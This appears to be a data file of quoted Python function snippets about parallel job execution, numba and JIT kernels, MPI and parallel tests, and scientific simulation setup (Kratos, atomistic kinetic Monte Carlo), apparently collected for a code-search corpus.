identifier=identifier,\n metadata=metadata,\n uniqueHandler=uniqueHandler,\n profile=self.__profileJobs)\n else:\n if self._parallelLib == ParallelLibEnum.dask:\n arguments = tuple([self._server] + list(args))\n else:\n arguments = args\n if self._parallelLib == ParallelLibEnum.dask:\n internalJob = Runners.factory.returnInstance('DaskRunner', arguments,\n functionToRun.original_function,\n identifier=identifier,\n metadata=metadata,\n uniqueHandler=uniqueHandler,\n profile=self.__profileJobs)\n\n elif self._parallelLib == ParallelLibEnum.ray:\n internalJob = Runners.factory.returnInstance('RayRunner', arguments,\n functionToRun.remote,\n identifier=identifier,\n metadata=metadata,\n uniqueHandler=uniqueHandler,\n profile=self.__profileJobs)\n # set the client info\n internalJob.clientRunner = clientQueue\n # set the groupping id if present\n if groupInfo is not None:\n groupId = groupInfo['id']\n # TODO: create method in Runner to set flags,ids,etc in the instanciated runner\n internalJob.groupId = groupId\n if groupId not in self.__batching:\n # NOTE: The size of the group is only set once the first job beloning to a group is added\n # ***** THE size of a group is IMMUTABLE *****\n self.__batching[groupId] = {\"counter\": 0, \"ids\": [], \"size\": groupInfo['size'], 'finished': []}\n self.__batching[groupId][\"counter\"] += 1\n if self.__batching[groupId][\"counter\"] > self.__batching[groupId][\"size\"]:\n self.raiseAnError(RuntimeError, f\"group id {groupId} is full. Size reached:\")\n self.__batching[groupId][\"ids\"].append(identifier)\n # add the runner in the Queue\n self.reAddJob(internalJob)", "def run_job(job, interrupt_if_necessary):", "def test_diff_method_None_jit():\n\n dev = qml.device(\"default.qubit.jax\", wires=1, shots=10)\n\n @jax.jit\n def wrapper(x):\n with qml.queuing.AnnotatedQueue() as q:\n qml.RX(x, wires=0)\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n\n return qml.execute([tape], dev, gradient_fn=None)\n\n assert jax.numpy.allclose(wrapper(jax.numpy.array(0.0))[0], 1.0)", "def round_numba(g):\n N = len(g)\n gr = np.zeros(N)\n for i in range(N):\n gr[i] = round(g[i])\n return gr", "def run_job(args):\n\n global stop_all\n global jobfiles_global\n global jobwcl\n\n jobwcl = WCL()\n jobfiles = {'infullnames': [args.config, args.workflow],\n 'outfullnames': [],\n 'output_putinfo': {}}\n jobfiles_global = {'infullnames': [args.config, args.workflow],\n 'outfullnames': [],\n 'output_putinfo': {}}\n\n jobstart = time.time()\n with open(args.config, 'r') as wclfh:\n jobwcl.read(wclfh, filename=args.config)\n jobwcl['verify_files'] = miscutils.checkTrue('verify_files', jobwcl, False)\n jobwcl['jobroot'] = os.getcwd()\n jobwcl['job_max_usage'] = 0\n #jobwcl['pre_job_disk_usage'] = pfwutils.diskusage(jobwcl['jobroot'])\n jobwcl['pre_job_disk_usage'] = 0\n\n # Save pointers to archive information for quick lookup\n if jobwcl[pfwdefs.USE_HOME_ARCHIVE_INPUT] != 'never' or \\\n jobwcl[pfwdefs.USE_HOME_ARCHIVE_OUTPUT] != 'never':\n jobwcl['home_archive_info'] = jobwcl[pfwdefs.SW_ARCHIVESECT][jobwcl[pfwdefs.HOME_ARCHIVE]]\n else:\n jobwcl['home_archive_info'] = None\n\n if jobwcl[pfwdefs.USE_TARGET_ARCHIVE_INPUT] != 'never' or \\\n jobwcl[pfwdefs.USE_TARGET_ARCHIVE_OUTPUT] != 'never':\n jobwcl['target_archive_info'] = jobwcl[pfwdefs.SW_ARCHIVESECT][jobwcl[pfwdefs.TARGET_ARCHIVE]]\n else:\n jobwcl['target_archive_info'] = None\n\n # run the tasks (i.e., each wrapper execution)\n stop_all = miscutils.checkTrue('stop_on_fail', jobwcl, True)\n\n try:\n jobfiles['infullnames'] = gather_initial_fullnames()\n jobfiles_global['infullnames'].extend(jobfiles['infullnames'])\n miscutils.coremakedirs('log')\n miscutils.coremakedirs('outputwcl')\n exitcode, jobfiles = job_workflow(args.workflow, jobfiles, jobwcl)\n except Exception:\n (extype, exvalue, trback) = sys.exc_info()\n print '!' * 60\n traceback.print_exception(extype, exvalue, trback, file=sys.stdout)\n exitcode = pfwdefs.PF_EXIT_FAILURE\n print \"Aborting rest of wrapper executions. Continuing to end-of-job tasks\\n\\n\"\n\n try:\n create_junk_tarball(jobwcl, jobfiles, exitcode)\n except:\n print \"Error creating junk tarball\"\n # if should transfer at end of job\n if jobfiles['output_putinfo']:\n print \"\\n\\nCalling file transfer for end of job (%s files)\" % \\\n (len(jobfiles['output_putinfo']))\n\n copy_output_to_archive(jobwcl, jobfiles, jobfiles['output_putinfo'], 'job',\n 'job_output', exitcode)\n else:\n print \"\\n\\n0 files to transfer for end of job\"\n if miscutils.fwdebug_check(1, \"PFWRUNJOB_DEBUG\"):\n miscutils.fwdebug_print(\"len(jobfiles['outfullnames'])=%s\" % \\\n (len(jobfiles['outfullnames'])))\n print \"\\nDESDMTIME: pfwrun_job %0.3f\" % (time.time()-jobstart)\n return exitcode", "def serial_job(func, inputs):\n\n output = []\n for i, finput in enumerate(inputs):\n foutput = func(finput)\n output.append(foutput)\n output = np.array(output, dtype=object)\n\n return np.transpose(output)", "def __call__(self, *args, **kwargs):\n\n wait_for = kwargs.pop(\"wait_for\", None)\n\n # {{{ run control\n\n key_bits = kwargs.pop(\"key_bits\", None)\n if key_bits is None:\n key_bits = int(np.iinfo(self.key_dtype).bits)\n\n n = len(args[self.first_array_arg_idx])\n\n allocator = kwargs.pop(\"allocator\", None)\n if allocator is None:\n allocator = args[self.first_array_arg_idx].allocator\n\n queue = kwargs.pop(\"allocator\", None)\n if queue is None:\n queue = args[self.first_array_arg_idx].queue\n\n args = list(args)\n\n base_bit = 0\n while base_bit < key_bits:\n sorted_args = [\n cl.array.empty(queue, n, arg_descr.dtype, allocator=allocator)\n for arg_descr in self.arguments\n if arg_descr.name in self.sort_arg_names]\n\n scan_args = args + sorted_args + [base_bit]\n\n last_evt = self.scan_kernel(*scan_args,\n **dict(queue=queue, wait_for=wait_for))\n wait_for = [last_evt]\n\n # substitute sorted\n for i, arg_descr in enumerate(self.arguments):\n if arg_descr.name in self.sort_arg_names:\n args[i] = sorted_args[self.sort_arg_names.index(arg_descr.name)]\n\n base_bit += self.bits\n\n return [arg_val\n for arg_descr, arg_val in zip(self.arguments, args)\n if arg_descr.name in self.sort_arg_names], last_evt\n\n # }}}", "def process_kernel_arg(\n self, var, llvm_arg, arg_type, index, modified_arrays, sycl_queue_val\n ):\n if isinstance(arg_type, types.npytypes.Array):\n if llvm_arg is None:\n raise NotImplementedError(arg_type, var)\n\n storage = cgutils.alloca_once(self.builder, utils.LLVMTypes.int64_t)\n self.builder.store(self.context.get_constant(types.int64, 0), storage)\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n storage,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n storage = cgutils.alloca_once(self.builder, utils.LLVMTypes.int64_t)\n self.builder.store(self.context.get_constant(types.int64, 0), storage)\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n storage,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n # Handle array size\n array_size_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 2),\n ],\n )\n\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n array_size_member,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n # Handle itemsize\n item_size_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 3),\n ],\n )\n\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n item_size_member,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n # Calculate total buffer size\n total_size = cgutils.alloca_once(\n self.builder,\n utils.get_llvm_type(context=self.context, type=types.intp),\n size=utils.get_one(context=self.context),\n name=\"total_size\" + str(self.cur_arg),\n )\n self.builder.store(\n self.builder.sext(\n self.builder.mul(\n self.builder.load(array_size_member),\n self.builder.load(item_size_member),\n ),\n utils.get_llvm_type(context=self.context, type=types.intp),\n ),\n total_size,\n )\n\n # Handle data\n data_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 4),\n ],\n )\n\n # names are replaced using legalize names, we have to do the same\n # here for them to match.\n legal_names = legalize_names([var])\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.voidptr)\n\n if isinstance(arg_type, nus.UsmSharedArrayType):\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n self.builder.load(data_member),\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n else:\n malloc_fn = DpctlCAPIFnBuilder.get_dpctl_malloc_shared(\n builder=self.builder, context=self.context\n )\n memcpy_fn = DpctlCAPIFnBuilder.get_dpctl_queue_memcpy(\n builder=self.builder, context=self.context\n )\n event_del_fn = DpctlCAPIFnBuilder.get_dpctl_event_delete(\n builder=self.builder, context=self.context\n )\n event_wait_fn = DpctlCAPIFnBuilder.get_dpctl_event_wait(\n builder=self.builder, context=self.context\n )\n\n # Not known to be USM so we need to copy to USM.\n buffer_name = \"buffer_ptr\" + str(self.cur_arg)\n # Create void * to hold new USM buffer.\n buffer_ptr = cgutils.alloca_once(\n self.builder,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n name=buffer_name,\n )\n # Setup the args to the USM allocator, size and SYCL queue.\n args = [\n self.builder.load(total_size),\n self.builder.load(sycl_queue_val),\n ]\n # Call USM shared allocator and store in buffer_ptr.\n self.builder.store(self.builder.call(malloc_fn, args), buffer_ptr)\n\n if legal_names[var] in modified_arrays:\n self.write_buffs.append((buffer_ptr, total_size, data_member))\n else:\n self.read_only_buffs.append((buffer_ptr, total_size, data_member))\n\n # We really need to detect when an array needs to be copied over\n if index < self.num_inputs:\n args = [\n self.builder.load(sycl_queue_val),\n self.builder.load(buffer_ptr),\n self.builder.bitcast(\n self.builder.load(data_member),\n utils.get_llvm_type(\n context=self.context, type=types.voidptr\n ),\n ),\n self.builder.load(total_size),\n ]\n event_ref = self.builder.call(memcpy_fn, args)\n self.builder.call(event_wait_fn, [event_ref])\n self.builder.call(event_del_fn, [event_ref])\n\n self._form_kernel_arg_and_arg_ty(self.builder.load(buffer_ptr), ty)\n\n # Handle shape\n shape_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 5),\n ],\n )\n\n for this_dim in range(arg_type.ndim):\n shape_entry = self.builder.gep(\n shape_member,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, this_dim),\n ],\n )\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n shape_entry,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n # Handle strides\n stride_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 6),\n ],\n )\n\n for this_stride in range(arg_type.ndim):\n stride_entry = self.builder.gep(\n stride_member,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, this_stride),\n ],\n )\n\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n stride_entry,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n else:\n ty = numba_type_to_dpctl_typenum(context=self.context, type=arg_type)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n llvm_arg,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )", "def ExecuteInstanceDeterministicAdaptiveRefinementAux_Functionality(pickled_model,pickled_project_parameters,current_analysis_stage,random_variable,previous_computational_time,mapping_flag,pickled_mapping_reference_model,print_to_file,filename,open_mp_threads):\n\n start_time = time.time()\n # overwrite the old model serializer with the unpickled one\n model_serializer = pickle.loads(pickled_model)\n current_model = KratosMultiphysics.Model()\n model_serializer.Load(\"ModelSerialization\",current_model)\n del(model_serializer)\n # overwrite the old parameters serializer with the unpickled one\n serialized_project_parameters = pickle.loads(pickled_project_parameters)\n current_project_parameters = KratosMultiphysics.Parameters()\n serialized_project_parameters.Load(\"ParametersSerialization\",current_project_parameters)\n del(serialized_project_parameters)\n\n # Set IS_RESTARTED flag to True, STEP to zero and TIME to 0,\n # since the model has already been initialized and eventually run.\n # The model we run is coming from\n # level 0: directly from serialization, where Initialize() method is called\n # level > 0: from ExecuteInstanceStochasticAdaptiveRefinementAux_Functionality(),\n # where the model is run and then returned as an output.\n model_part_name = current_project_parameters[\"solver_settings\"][\"model_part_name\"].GetString()\n current_model.GetModelPart(model_part_name).ProcessInfo.SetValue(KratosMultiphysics.TIME, 0.0)\n current_model.GetModelPart(model_part_name).ProcessInfo.SetValue(KratosMultiphysics.STEP, 0)\n current_model.GetModelPart(model_part_name).ProcessInfo.SetValue(KratosMultiphysics.IS_RESTARTED, True)\n\n # constructor analysis stage\n simulation = current_analysis_stage(current_model,current_project_parameters,random_variable)\n # add filename flag print_to_file is true\n if (print_to_file):\n simulation.filename = filename\n # add flag if current index is maximum index: always True\n simulation.is_current_index_maximum_index = True\n # mapping if in current finest level (always true) and mapping flag is true\n # otherwise standard behavior\n if (mapping_flag is True):\n # unpickle mapping reference model and build Kratos Model object\n serialized_mapping_reference_model = pickle.loads(pickled_mapping_reference_model)\n mapping_reference_model = KratosMultiphysics.Model()\n serialized_mapping_reference_model.Load(\"ModelSerialization\",mapping_reference_model)\n del(serialized_mapping_reference_model)\n # send reference model to analysis stage for mapping and set mapping flag to true\n simulation.mapping_reference_model = mapping_reference_model\n simulation.mapping = True\n simulation.Run()\n # mapping if in current finest level and mapping flag is true\n # otherwise standard qoi evaluation\n if (mapping_flag is True):\n qoi = simulation.MappingAndEvaluateQuantityOfInterest()\n else:\n qoi = simulation.EvaluateQuantityOfInterest()\n del(simulation)\n end_time = time.time()\n computational_time = previous_computational_time + open_mp_threads*(end_time-start_time) # multiply by open mp threads to consider real machine cost\n return qoi,computational_time", "def parallelize_initfunction(targetlist, callerfunc,concurrentevents=5, *extrafuncargs):\r\n\r\n parallelizehandle = uniqueid_getid()\r\n\r\n # set up the dict locally one line at a time to avoid a ginormous line\r\n handleinfo = {}\r\n handleinfo['abort'] = False\r\n handleinfo['callfunc'] = callerfunc\r\n handleinfo['callargs'] = extrafuncargs\r\n # make a copy of target list because \r\n handleinfo['targetlist'] = targetlist[:]\r\n handleinfo['availabletargetpositions'] = range(len(handleinfo['targetlist']))\r\n handleinfo['result'] = {'exception':[],'returned':[],'aborted':[]}\r\n handleinfo['runninglist'] = []\r\n\r\n \r\n parallelize_info_dict[parallelizehandle] = handleinfo\r\n\r\n # don't start more threads than there are targets (duh!)\r\n threads_to_start = min(concurrentevents, len(handleinfo['targetlist']))\r\n\r\n for workercount in range(threads_to_start):\r\n # we need to append the workercount here because we can't return until \r\n # this is scheduled without having race conditions\r\n parallelize_info_dict[parallelizehandle]['runninglist'].append(workercount)\r\n try:\r\n settimer(0.0, parallelize_execute_function, (parallelizehandle,workercount))\r\n except:\r\n # If I'm out of resources, stop\r\n # remove this worker (they didn't start)\r\n parallelize_info_dict[parallelizehandle]['runninglist'].remove(workercount)\r\n if not parallelize_info_dict[parallelizehandle]['runninglist']:\r\n parallelize_closefunction(parallelizehandle)\r\n raise Exception, \"No events available!\"\r\n break\r\n \r\n return parallelizehandle", "def _minmaxkernel_numba(data_1, data_2):\n\n\n result = np.zeros((data_1.shape[0], data_2.shape[0]), dtype=np.float64)\n\n for i in prange(data_1.shape[0]):\n for j in prange(data_2.shape[0]):\n result[i,j] = _minmax_two_fp(data_1[i], data_2[j])\n return result", "def ms_function(fn=None, input_signature=None, hash_args=None, jit_config=None):\n\n logger.warning(\"'mindspore.ms_function' will be deprecated and removed in a future version. \"\n \"Please use 'mindspore.jit' instead.\")\n return jit(fn=fn, input_signature=input_signature, hash_args=hash_args, jit_config=jit_config)", "def initialize(self):\n # set the maximum queue size (number of jobs to queue past the running number)\n self.maxQueueSize = self.runInfoDict['maxQueueSize']\n # defaults to None; if None, then use batchSize instead\n if self.maxQueueSize is None:\n self.maxQueueSize = self.runInfoDict['batchSize']\n # if requested max size less than 1, we can't do that, so take 1 instead\n if self.maxQueueSize < 1:\n self.raiseAWarning('maxQueueSize was set to be less than 1! Setting to 1...')\n self.maxQueueSize = 1\n self.raiseADebug('Setting maxQueueSize to', self.maxQueueSize)\n\n # initialize PBS\n with self.__queueLock:\n self.__running = [None]*self.runInfoDict['batchSize']\n self.__clientRunning = [None]*self.runInfoDict['batchSize']\n self._parallelLib = ParallelLibEnum.shared\n if self.runInfoDict['parallelMethod'] is not None and self.runInfoDict['parallelMethod'] != ParallelLibEnum.distributed:\n self._parallelLib = self.runInfoDict['parallelMethod']\n elif self.runInfoDict['internalParallel'] or \\\n self.runInfoDict['parallelMethod'] is not None and self.runInfoDict['parallelMethod'] == ParallelLibEnum.distributed:\n #If ParallelLibEnum.distributed or internalParallel True\n # than choose a library automatically.\n if _daskAvail:\n self._parallelLib = ParallelLibEnum.dask\n elif _rayAvail:\n self._parallelLib = ParallelLibEnum.ray\n else:\n self.raiseAWarning(\"Distributed Running requested but no parallel method found\")\n self._parallelLib = ParallelLibEnum.shared\n desiredParallelMethod = f\"parallelMethod: {self.runInfoDict['parallelMethod']} internalParallel: {self.runInfoDict['internalParallel']}\"\n self.raiseADebug(f\"Using parallelMethod: {self._parallelLib} because Input: {desiredParallelMethod} and Ray Availablility: {_rayAvail} and Dask Availabilitiy: {_daskAvail}\")\n if self._parallelLib == ParallelLibEnum.dask and not _daskAvail:\n self.raiseAnError(RuntimeError, f\"dask requested but not available. {desiredParallelMethod}\")\n if self._parallelLib == ParallelLibEnum.ray and not _rayAvail:\n self.raiseAnError(RuntimeError, f\"ray requested but not available. {desiredParallelMethod}\")\n # internal server is initialized only in case an internal calc is requested\n if not self.__isDistributedInitialized:\n self.__initializeDistributed()", "def minimize(fun, \n bounds = None, \n value_limit = math.inf,\n num_retries = 1000,\n logger = None,\n workers = mp.cpu_count(),\n popsize = 31, \n max_evaluations = 50000, \n capacity = 500,\n stop_fittness = None,\n optimizer = None,\n ):\n\n if optimizer is None:\n optimizer = de_cma(max_evaluations, popsize, stop_fittness) \n store = Store(bounds, capacity = capacity, logger = logger)\n return retry(fun, store, optimizer.minimize, num_retries, value_limit, workers)", "def test_onearg_and_default(self):\n varargs = (12,)\n kwargs = {}\n method = getattr(self.foo,'f_onearg_and_default')\n var_dict = reassign_function_arguments(method, varargs, kwargs)\n self.assert_(var_dict['arg1'] == 12)\n self.assert_(var_dict['default'] == 1)\n self.assert_(len(var_dict) == 2)\n var_dict = reassign_function_arguments(method, (12, 13), kwargs)\n self.assert_(var_dict['arg1'] == 12)\n self.assert_(var_dict['default'] == 13)\n self.assert_(len(var_dict) == 2)", "def job_in(fn):\n @wraps(fn)\n def new(job):\n # do something with the job object\n return fn(job.arg)\n return new", "def job_gen(self, time_frame):", "def generate_numba_ewm_func(\n nopython: bool,\n nogil: bool,\n parallel: bool,\n com: float,\n adjust: bool,\n ignore_na: bool,\n deltas: tuple,\n normalize: bool,\n):\n if TYPE_CHECKING:\n import numba\n else:\n numba = import_optional_dependency(\"numba\")\n\n @numba.jit(nopython=nopython, nogil=nogil, parallel=parallel)\n def ewm(\n values: np.ndarray,\n begin: np.ndarray,\n end: np.ndarray,\n minimum_periods: int,\n ) -> np.ndarray:\n result = np.empty(len(values))\n alpha = 1.0 / (1.0 + com)\n old_wt_factor = 1.0 - alpha\n new_wt = 1.0 if adjust else alpha\n\n for i in numba.prange(len(begin)):\n start = begin[i]\n stop = end[i]\n window = values[start:stop]\n sub_result = np.empty(len(window))\n\n weighted = window[0]\n nobs = int(not np.isnan(weighted))\n sub_result[0] = weighted if nobs >= minimum_periods else np.nan\n old_wt = 1.0\n\n for j in range(1, len(window)):\n cur = window[j]\n is_observation = not np.isnan(cur)\n nobs += is_observation\n if not np.isnan(weighted):\n if is_observation or not ignore_na:\n if normalize:\n # note that len(deltas) = len(vals) - 1 and deltas[i]\n # is to be used in conjunction with vals[i+1]\n old_wt *= old_wt_factor ** deltas[start + j - 1]\n else:\n weighted = old_wt_factor * weighted\n if is_observation:\n if normalize:\n # avoid numerical errors on constant series\n if weighted != cur:\n weighted = old_wt * weighted + new_wt * cur\n if normalize:\n weighted = weighted / (old_wt + new_wt)\n if adjust:\n old_wt += new_wt\n else:\n old_wt = 1.0\n else:\n weighted += cur\n elif is_observation:\n weighted = cur\n\n sub_result[j] = weighted if nobs >= minimum_periods else np.nan\n\n result[start:stop] = sub_result\n\n return result\n\n return ewm", "def test_MPI_Parallel_Interface(comm):\n\n def printMPI(msg):\n for i in range(comm.Get_size()):\n comm.barrier()\n if comm.Get_rank() == i:\n print(\"Proc {}: {}\".format(i, msg))\n\n n = 10\n\n par = MPI_Objective_Interface(mp.Extended_Rosenbrock, nb_domain_grid_pts=n,\n comm=comm)\n\n printMPI(par.counts)\n\n # ref = mp.Extended_Rosenbrock\n\n np.testing.assert_array_equal(\n mp.Extended_Rosenbrock.startpoint(n)[par.subdomain_slices],\n par.startpoint())\n np.testing.assert_almost_equal(\n mp.Extended_Rosenbrock.f(mp.Extended_Rosenbrock.startpoint(n)),\n par.f(par.startpoint()),\n err_msg=\"Different Function Value at startpoint\")\n np.testing.assert_allclose(\n mp.Extended_Rosenbrock.grad(mp.Extended_Rosenbrock.startpoint(n))[\n par.subdomain_slices],\n par.grad(par.startpoint()),\n err_msg=\"Different Gradient Value at startpoint\")", "def test_parallel_kwargs():\r\n lst = range(10)\r\n for n_jobs in (1, 4):\r\n yield (nose.tools.assert_equal,\r\n [f(x, y=1) for x in lst],\r\n Parallel(n_jobs=n_jobs)(delayed(f)(x, y=1) for x in lst)\r\n )", "def func(job):\n return start_process(job)", "def nop_minifier(arg):\n return arg", "def par(func):\n opt[\"par\"].add(key(func))\n return func", "def test_SMEB_args():\n testing_function('sme_bl', bilinear=True)", "def parallel(self, func, args_dict=None):\n try:\n self.parallel_safe(func, args_dict)\n except Exception:\n pass", "def sum_numba(A):\n N = A.shape\n B = np.zeros((N[0], N[2]))\n for i in range(N[0]):\n for j in range(N[2]):\n for k in range(N[1]):\n B[i, j] += A[i, k, j]\n return B", "def __init__(self, n_jobs=1, verbose=True):\n self.n_jobs = n_jobs\n self.verbose = verbose", "def createjob(args):\n ncell = args.ncell\n nmg = args.nmg\n nsi = args.nsi\n nvac = args.nvac\n a0 = args.a0\n temp = args.temp\n nseeds = args.nseeds\n seeds = args.seeds\n nsteps = args.nsteps\n foldername_append = args.foldername_append\n pot = args.pot\n submit = args.submit\n submitdebug = args.submitdebug\n submittime_hours = args.submittime_hours\n test = args.test\n testfiles = args.testfiles\n nodes = args.nodes\n verbose = args.verbose\n\n\n ### check if ase runner/quippy/lammpps-data formats are known\n ase_formats = mu.ase_get_known_formats_class(verbose=True)\n ase_formats.check_if_default_formats_known(copy_and_adapt_formatspy_anyhow=False)\n\n # definex ffsocket inet/unix\n if nodes == 1:\n ffsocket = \"unix\"\n elif nodes > 1:\n ffsocket = \"inet\"\n else:\n sys.exit(\"Number of nodes has to be positive!\")\n\n\n # define ntasks, neval\n lmp_par = 2 # = OMP_NUM_THREADS\n ntasks = cores = nodes * 28\n ipi_inst = 4 # for sure best on fidis\n neval = ipi_inst*2 # was alwasy better, for ompi and impi\n\n ##### get the seed(s).\n if type(seeds) == bool:\n seeds = random.sample(range(1, 999999), nseeds)\n print('seeds',seeds)\n if test == True:\n nseeds = 1\n seeds = [1]\n print('seeds',seeds)\n nseeds = len(seeds)\n\n ##### a few checks\n scripts = mu.scripts()\n mypot = mu.mypot(pot)\n if submit is True or submitdebug is True:\n hostcheck = os.environ[\"myhost\"]\n if hostcheck == \"\":\n sys.exit('host unknown 87')\n\n\n ##### here only chck if the potential can be set up. (in.lmp)\n ##### the same command is then executed for every kmc folder\n ace = mu.ase_calculate_ene(pot=pot,\n potpath=False,\n units='eV',geopt=False,kmc=True,verbose=verbose)\n ace.pot_get_and_ase_lmp_cmd(kmc=True,temp=temp,nsteps=nsteps,ffsocket=ffsocket)\n\n ##### if test\n if test == True:\n nsteps = 50\n\n file_ipi_input_runner = scripts + \"/i-pi-mc_scripts/input-runner.xml\"\n\n\n ####################################\n # get directory\n ####################################\n if verbose:\n print(\"get directory\")\n pcsi = nsi/ncell**3.*100\n pcmg = nmg/ncell**3.*100\n pcvac = nvac/ncell**3.*100\n if args.cubic == True:\n pc = \"cubic\"\n else:\n pc = \"primitive\"\n directory = str(ncell)+\"x\"+str(ncell)+\"x\"+str(ncell)+\"_\"+pc+\"_\"+pot+\"_\"+\\\n str(temp)+\"K_\"+\\\n str(nvac)+\"Vac_\"+str(nmg)+\"Mg_\"+str(nsi)+\"Si__\"+\\\n str(round(pcvac,3))+\"pctVac_\"+str(round(pcmg,3))+\"pctMg_\"+str(round(pcsi,3))+\"pctSi\"\n if foldername_append != \"\":\n directory = directory+\"_\"+foldername_append\n\n ###############################################\n # make the structure\n ###############################################\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell,nsi,nmg,nvac,a0,create_fake_vacancy = True,cubic=args.cubic)\n atomsc = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell,nsi,nmg,nvac,a0,cubic=args.cubic)\n\n # make the atomic structure\n # this was to play ... not necessary now?\n if False:\n nndist = a0/np.sqrt(2.)\n\n from ase.io import read as ase_read\n from ase.io import write as ase_write\n\n ###############################################\n # get the amount of 1NN in a relly large cell\n ###############################################\n atomsc_fakevac_i = ase_read('dataxx.extxyz3',index=\":\",format='extxyz') # works, cell ist not changed\n #atomsc_fakevac_i = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=10,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n #nn = mu.ase_get_neighborlist(atomsc_fakevac_i,atomnr=0,cutoff=3.,skin=0.1)\n #print(\"nn\",nn,'len',len(nn))\n #nn = mu.ase_get_neighborlist(atomsc_fakevac_i,atomnr=0,cutoff=8.5,skin=0.1)\n #print(\"nn\",nn,'len',len(nn))\n #sys.exit()\n\n print(len(atomsc_fakevac_i),type(atomsc_fakevac_i))\n\n for idx,i in enumerate(atomsc_fakevac_i):\n print('aa',atomsc_fakevac_i[idx].positions[0])\n #print('aa',i.positions[0])\n print('ipi')\n atomsc_fakevac_i = ase_read('dataxx.ipi2',index=\":\",format='ipi') # works, cell ist not changed\n print(len(atomsc_fakevac_i),type(atomsc_fakevac_i))\n for idx,i in enumerate(atomsc_fakevac_i):\n print('aa',atomsc_fakevac_i[idx].positions[0])\n #print('aa',i.positions[0])\n print('quippy')\n atomsc_fakevac_i = ase_read('dataxx.quippy.xyz2',index=\":\",format='quippy') # works, cell ist not changed\n\n\n\n filename = '../sim.xyz'\n filename = '../simulation.pos_0.xyz'\n mu.count_amount_1NN_around_vacancies(filename,cutoffa=nndist,cutoffb=a0,skin=0.1,format='ipi')\n sys.exit()\n\n def mysave_quippy_xyz(atomsc_fakevac,text=False):\n if type(text) == bool:\n sys.exit('define text')\n atomsc_fakevac.write('data.quippy.xyz',format='quippy',append=True)\n #atomsc_fakevac.write('data.xyz',format=\"extxyz\",append=True)\n atomsc_fakevac.write('data'+text+'.quippy.xyz',format='quippy',append=True)\n #atomsc_fakevac.write('data'+text+'.xyz',format=\"extxyz\",append=True)\n return\n\n # create Al with single vacancy\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n NN_1_indices, NN_2_indices = mu.ase_get_neighborlist_1NN_2NN(atomsc_fakevac,atomnr=0,cutoffa=nndist,cutoffb=a0,skin=0.1)\n #print('from ....',(atomsc_fakevac.positions)[0])\n #for i in NN_1_indices:\n # print((atomsc_fakevac.positions)[i])\n print('NN_1_indices (orig ):',NN_1_indices)\n print('NN_2_indices (orig ):',NN_2_indices)\n #sys.exit()\n atomsc_fakevac.write('dataxx.quippy.xyz',format='quippy',append=True)\n atomsc_fakevac.write('dataxx.poscar',format='vasp',append=True)\n atomsc_fakevac.write('dataxx.ipi',format='ipi',append=True) # works, currently so implemented that it canges cell\n atomsc_fakevac.write('dataxx.xyz',format='xyz',append=True)\n atomsc_fakevac.write('dataxx.extxyz',format='extxyz',append=True)\n atomsc_fakevac.write('dataxx.lammps-data',format='lammps-data',append=True)\n atomsc_fakevac.write('dataxx.lammps-runner',format='lammps-runner',append=True)\n\n atomsc_fakevac_a = ase_read('dataxx.extxyz',format='extxyz') # works, cell ist not changed\n atomsc_fakevac_a.write('dataxx.extxyz2',format='extxyz',append=True) # works, cell is not changed\n\n atomsc_fakevac_b = ase_read('dataxx.xyz',format='xyz') # not working # but this should work\n atomsc_fakevac_b.write('dataxx.xyz2',format='xyz',append=True) # this is working\n\n atomsc_fakevac_c = ase_read('dataxx.ipi',format='ipi') # works, currently so implemented that it canges cell\n #print('ipi cell',atomsc_fakevac_c.get_cell())\n\n atomsc_fakevac_c.write('dataxx.ipi2',format='ipi',append=True) # works, just writes the cell it gests.\n 